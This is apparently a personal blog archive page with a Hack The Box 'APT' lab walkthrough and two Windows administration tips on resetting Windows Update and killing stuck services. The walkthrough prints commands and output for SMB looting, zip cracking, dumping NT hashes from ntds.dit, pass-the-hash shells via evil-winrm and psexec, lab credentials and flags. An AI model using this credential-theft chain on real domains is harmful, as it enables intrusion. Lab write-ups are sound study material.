Month: December 2020
Protected: htb-ropetwo-nl
Protected: htb-ra2-nl
Protected: thm-ra-nl
Protected: thm-yearoftheowl-nl
Protected: htb-ready-nl
Protected: htb-compromised-nl
htb-apt-nl
.
i used https://github.com/puckiestyle/python/blob/master/IOXIDresolver.py
reference used :
The OXID Resolver [Part 1] – Remote enumeration of network interfaces without any authentication
┌─[root@parrot-virtual]─[/home/user/htb]
└──╼ #python3 IOXIDresolver.py -t 10.10.10.213
[*] Retrieving network interface of 10.10.10.213
Address: apt
Address: 10.10.10.213
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::8d29:507a:2edb:a06e
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i dead:beef::b885:d62a:d679:573f -u roastsvc -p ‘!!!watermelon245’
└──╼
$nmap -6 -sV dead:beef::b885:d62a:d679:573f Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-04 14:52 GMT Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 9.09% done; ETC: 14:54 (0:01:00 remaining) Stats: 0:01:57 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 90.91% done; ETC: 14:55 (0:00:11 remaining) Nmap scan report for dead:beef::b885:d62a:d679:573f Host is up (0.026s latency). Not shown: 989 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? 80/tcp open http Microsoft IIS httpd 10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-12-04 14:53:07Z) 135/tcp open msrpc Microsoft Windows RPC 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=12/4%Time=5FCA4D54%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 149.32 seconds
.
evil-winrm -i dead:beef::b885:d62a:d679:573f -u henry.vinson_adm -p ‘G1#Ny5@2dvht’
1) get IPV6
2) smbclient connect to it and get backup.zip
3) crack zip with rockyou.txt
4) run secretsdump.py (impacket) on ntds.dlt
5) run kerbrute to find valid users
6) make a list of hashes
7) use crackmapexec -H hashes.txt
┌─[✗]─[puck@parrot-lt]─[~/htb/apt]
└──╼ $impacket-smbclient htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# ls
[-] No share selected
# shares
backup
IPC$
NETLOGON
SYSVOL
# use backup
# ls
drw-rw-rw- 0 Thu Sep 24 08:31:03 2020 .
drw-rw-rw- 0 Thu Sep 24 08:31:03 2020 ..
-rw-rw-rw- 10650961 Thu Sep 24 08:31:03 2020 backup.zip
# get backup.zip
┌─[puck@parrot-lt]─[~/htb/apt]
└──╼ $impacket-lookupsid htb.local/henry.vinson_adm:G1#Ny5@2dvht@htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Brute forcing SIDs at htb.local
[*] StringBinding ncacn_np:htb.local[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2993095098-2100462451-206186470
498: HTB\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: HTB\Administrator (SidTypeUser)
501: HTB\Guest (SidTypeUser)
502: HTB\krbtgt (SidTypeUser)
503: HTB\DefaultAccount (SidTypeUser)
512: HTB\Domain Admins (SidTypeGroup)
513: HTB\Domain Users (SidTypeGroup)
514: HTB\Domain Guests (SidTypeGroup)
515: HTB\Domain Computers (SidTypeGroup)
516: HTB\Domain Controllers (SidTypeGroup)
517: HTB\Cert Publishers (SidTypeAlias)
518: HTB\Schema Admins (SidTypeGroup)
519: HTB\Enterprise Admins (SidTypeGroup)
520: HTB\Group Policy Creator Owners (SidTypeGroup)
521: HTB\Read-only Domain Controllers (SidTypeGroup)
522: HTB\Cloneable Domain Controllers (SidTypeGroup)
525: HTB\Protected Users (SidTypeGroup)
526: HTB\Key Admins (SidTypeGroup)
527: HTB\Enterprise Key Admins (SidTypeGroup)
553: HTB\RAS and IAS Servers (SidTypeAlias)
571: HTB\Allowed RODC Password Replication Group (SidTypeAlias)
572: HTB\Denied RODC Password Replication Group (SidTypeAlias)
1001: HTB\APT$ (SidTypeUser)
1102: HTB\DnsAdmins (SidTypeAlias)
1103: HTB\DnsUpdateProxy (SidTypeGroup)
1104: HTB\apt-Admins (SidTypeAlias)
1105: HTB\henry.vinson (SidTypeUser)
1106: HTB\henry.vinson_adm (SidTypeUser)
┌─[user@parrot-virtual]─[~/htb/apt]
.
┌─[user@parrot-virtual]─[~/htb/apt] └──╼ $zip2john backup.zip > encrypted.hash$ backup.zip/Active Directory/ is not encrypted! ver 2.0 backup.zip/Active Directory/ is not encrypted, or stored with non-handled compression type ver 2.0 backup.zip/Active Directory/ntds.dit PKZIP Encr: cmplen=8483543, decmplen=50331648, crc=ACD0B2FB ver 2.0 backup.zip/Active Directory/ntds.jfm PKZIP Encr: cmplen=342, decmplen=16384, crc=2A393785 ver 2.0 backup.zip/registry/ is not encrypted, or stored with non-handled compression type ver 2.0 backup.zip/registry/SECURITY PKZIP Encr: cmplen=8522, decmplen=262144, crc=9BEBC2C3 ver 2.0 backup.zip/registry/SYSTEM PKZIP Encr: cmplen=2157644, decmplen=12582912, crc=65D9BFCD NOTE: It is assumed that all files in each archive have the same password. If that is not the case, the hash may be uncrackable. To avoid this, use option -o to pick a file at a time. ┌─[user@parrot-virtual]─[~/htb/apt]
┌─[✗]─[user@parrot-virtual]─[~/htb/apt]
└──╼ $john encrypted.hash\$ --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch (backup.zip)
1g 0:00:00:00 DONE (2021-01-26 09:37) 20.00g/s 163840p/s 163840c/s 163840C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $python3 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211:::
--snip--
prue.olson:aes256-cts-hmac-sha1-96:cd0d76863148d8ad87c40bd1903a6af2295db46ce3e9494d1f8b95de99b91a64
prue.olson:aes128-cts-hmac-sha1-96:d817cf2341be47674e6d0dccab1237b0
prue.olson:des-cbc-md5:2c5dba54314c20ba
[*] ClearText password from ntds.dit
APT$:CLEARTEXT:4[%fo'zG`&BhR3cP[)U2NVS\LEYO/&^)<9xj6%#9\\?uJ4YPb`DRK" IES2fXK"f,X(Ql*fg0RfRq=!,BeAVFt^EVRR-L)VaTjv/QG9=o;G@g>Vab-UYc Yd
[*] Cleaning up...
┌─[user@parrot-virtual]─[~/htb/apt]
.
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $python3 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL > result.txt
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $cat result.txt | grep henry
henry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::
livy.henry:3900:aad3b435b51404eeaad3b435b51404ee:5c0f4f9540cad94bb2554c8684d9ea66:::
henry.vinson:aes256-cts-hmac-sha1-96:4c0ec4cffc953266ed72d9b565da62115655d2f402416af92e4e76d121663e2f
henry.vinson:aes128-cts-hmac-sha1-96:da63c28166768a2829f00d30ec9fbddd
henry.vinson:des-cbc-md5:80a2c83213b3dfd6
livy.henry:aes256-cts-hmac-sha1-96:8f0397da6b26addc0536c294a788b919dd980afb738e3a9c233afcfc90fba5b0
livy.henry:aes128-cts-hmac-sha1-96:b719dae2156cd496995db190411d319e
livy.henry:des-cbc-md5:1043cb0bce31c49e
┌─[user@parrot-virtual]─[~/htb/apt]
evil-winrm -i dead:beef::b885:d62a:d679:573f -u Administrator -H c370bddf384a691d811ff3495e8a72e2
thus
1st add ipv6 ip to etc/hosts !!!!! dead:beef::b885:d62a:d679:573f apt.htb htb.local
2nd
┌─[user@parrot-virtual]─[/opt/evil-winrm] └──╼ $sudo ruby evil-winrm.rb -i htb.local -u henry.vinson_adm Enter Password:G1#Ny5@2dvh Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> ls Directory: C:\Users\henry.vinson_adm\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 1/25/2021 11:53 AM 12674 Powerless.bat *Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> download Powerless.bat Info: Downloading C:\Users\henry.vinson_adm\Documents\Powerless.bat to Powerless.bat Info: Download successful! *Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>
3th
┌─[✗]─[user@parrot-virtual]─[/opt/evil-winrm] └──╼ $ruby evil-winrm.rb -i dead:beef::b885:d62a:d679:573f -u Administrator -H c370bddf384a691d811ff3495e8a72e2 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman" Error: Exiting with code 1
┌─[✗]─[user@parrot-virtual]─[/opt/evil-winrm] └──╼ $ruby evil-winrm.rb -i htb.local -u Administrator -H c370bddf384a691d811ff3495e8a72e2 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> net users User accounts for \\ ------------------------------------------------------------------------------- Administrator DefaultAccount Guest henry.vinson henry.vinson_adm krbtgt The command completed with one or more errors. *Evil-WinRM* PS C:\Users\Administrator\Documents> dir *Evil-WinRM* PS C:\Users\Administrator\Documents> cd .. *Evil-WinRM* PS C:\Users\Administrator> dir Directory: C:\Users\Administrator Mode LastWriteTime Length Name ---- ------------- ------ ---- d-r--- 9/24/2020 9:12 AM Contacts d-r--- 10/23/2020 10:59 AM Desktop d-r--- 9/24/2020 9:12 AM Documents d-r--- 9/24/2020 9:12 AM Downloads d-r--- 9/24/2020 9:12 AM Favorites d-r--- 9/24/2020 9:12 AM Links d-r--- 9/24/2020 9:12 AM Music d-r--- 9/24/2020 9:12 AM Pictures d-r--- 9/24/2020 9:12 AM Saved Games d-r--- 9/24/2020 9:12 AM Searches d-r--- 9/24/2020 9:12 AM Videos *Evil-WinRM* PS C:\Users\Administrator> cd Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> dir Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 12/4/2020 1:22 PM 34 root.txt *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt 0ca97e04be5679529b87cc2a2de98782 *Evil-WinRM* PS C:\Users\Administrator\Desktop> cd .. *Evil-WinRM* PS C:\Users\Administrator> cd .. *Evil-WinRM* PS C:\Users\> dir Directory: C:\Users Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 9/24/2020 7:54 AM Administrator d----- 9/24/2020 8:39 AM henry.vinson d----- 9/24/2020 8:40 AM henry.vinson_adm d-r--- 11/21/2016 2:39 AM Public *Evil-WinRM* PS C:\Users> cd henry.vinson_adm *Evil-WinRM* PS C:\Users\henry.vinson_adm> cd desktop *Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> type user.txt e1e73b8410cf060794a86e7f6a753f83 *Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop>
E:\PENTEST>psexec_windows.exe -hashes c370bddf384a691d811ff3495e8a72e2:c370bddf384a691d811ff3495e8a72e2 administrator@htb.local Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [*] Requesting shares on apt.htb..... [-] share 'backup' is not writable. [*] Found writable share NETLOGON [*] Uploading file RJdJAMfb.exe [*] Opening SVCManager on apt.htb..... [*] Creating service kOFV on apt.htb..... [*] Starting service kOFV.....
.
windows-update-clear-update-cache
I recently had a Windows 2016 server that could not install automatic updates. It always hang at some percentage and would never finish. The next step was to try to install an update (.msu file) manually. But this always hung forever at “Copying packages to the update cache”.
Here is what helped me:
Start a cmd box as Administrator
Run the following commands:
net stop wuauserv net stop cryptSvc net stop bits net stop msiserver del /f /q "%ALLUSERSPROFILE%\Application Data\Microsoft\Network\Downloader\qmgr*.dat" del /f /s /q %SystemRoot%\SoftwareDistribution\*.* del /f /s /q %SystemRoot%\system32\catroot2\*.* del /f /q %SystemRoot%\WindowsUpdate.log net start wuauserv net start cryptSvc net start bits net start msiserver
This will clear the Windows Update cache and the automatic updates should work again.
How to Force Kill a Stuck Windows Service Using TaskKill?
The easiest way to stop a stuck service is to use the built-in taskkill command-line tool. First of all, you need to find the PID (process identifier) of the service. As an example, let’s take the Windows Update service. Its system name is wuauserv
(you can check the name in the service properties in the services.msc
console).
Run this command in the elevated command prompt (it is important, or access denied error will appear):
sc queryex wuauserv
In our case, the PID of the wuauserv service is 9186.
To force kill a stuck process with the PID 9186, run the command:
taskkill /PID 9168 /F
SUCCESS: The process with PID 9168 has been terminated.
This command will forcibly terminate the service process. Now you can start the service with the sc start servicename
command or through the service management console
You can stop a hung service more elegantly without manually checking the PID of the service process. The taskkill tool has the /FI option, which allows you to use a filter to select the necessary services or processes. You can kill a specific service with the command:
taskkill /F /FI "SERVICES eq wuauserv"
Or you can skip the service name at all and killing all services in a hung state with the command:
taskkill /F /FI "status eq not responding"
After that, the service that is stack in the Stopping status should stop.
You can also use the taskkill utility to force stop the hang services on a remote computer:
taskkill /S mun-fs01 /F /FI "SERVICES eq wuauserv"
Force Stop a Stuck Windows Service with PowerShell
You can also use PowerShell to force the service to stop. Using the following command, you can get a list of services in the Stopping state:
Get-WmiObject -Class win32_service | Where-Object {$_.state -eq 'stop pending'}
Or in the Starting state:
Get-WmiObject -Class win32_service | Where-Object {$_.state -eq 'start pending'}
The Stop-Process cmdlet allows terminating the processes of all found services. The following PowerShell script will terminate all stuck service processes on Windows:
$Services = Get-WmiObject -Class win32_service -Filter "state = 'stop pending'"
if ($Services) {
foreach ($service in $Services) {
try {
Stop-Process -Id $service.processid -Force -PassThru -ErrorAction Stop
}
catch {
Write-Warning -Message "Error. Error details: $_.Exception.Message"
}
}
}
else {
Write-Output "No services with 'Stopping'.status"
}
You must use the Get-CimInstance
instead of the Get-WmiObject
cmdlet in the new PowerShell Core 6.x/7.x. Replace the first command of the script with:
$Services = Get-CimInstance -Class win32_service | where-Object state -eq 'stop pending'
….
Method 2: Reset Windows update components.
Resetting Windows Update Components will fix corrupt Windows Update Components and help you to install the Windows Updates. Please follow the below steps to reset the Windows Updates Components manually:
- Press Windows Key + X on the keyboard and then select “Command Prompt (Admin)” from the menu.
- Stop the BITS, Cryptographic, MSI Installer and the Windows Update Services. To do this, type the following commands at a command prompt. Press the “ENTER” key after you type each command.
- net stop wuauserv
- net stop cryptSvc
- net stop bits
- net stop msiserver
- Now rename the SoftwareDistribution and Catroot2 folder. You can do this by typing the following commands in the Command Prompt. Press the “ENTER” key after you type each command.
- ren C:\Windows\SoftwareDistribution SoftwareDistribution.old
- ren C:\Windows\System32\catroot2 Catroot2.old
- Now, let’s restart the BITS, Cryptographic, MSI Installer and the Windows Update Services. Type the following commands in the Command Prompt for this. Press the ENTER key after you type each command.
- net start wuauserv
- net start cryptSvc
- net start bits
- net start msiserver
5. Type Exit in the Command Prompt to close it.
Now you may try running the Windows Updates and check if the above steps resolve the issue.
For reference: https://support.microsoft.com/en-us/kb/971058
Disclaimer: Important this section, method, or task contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly.
.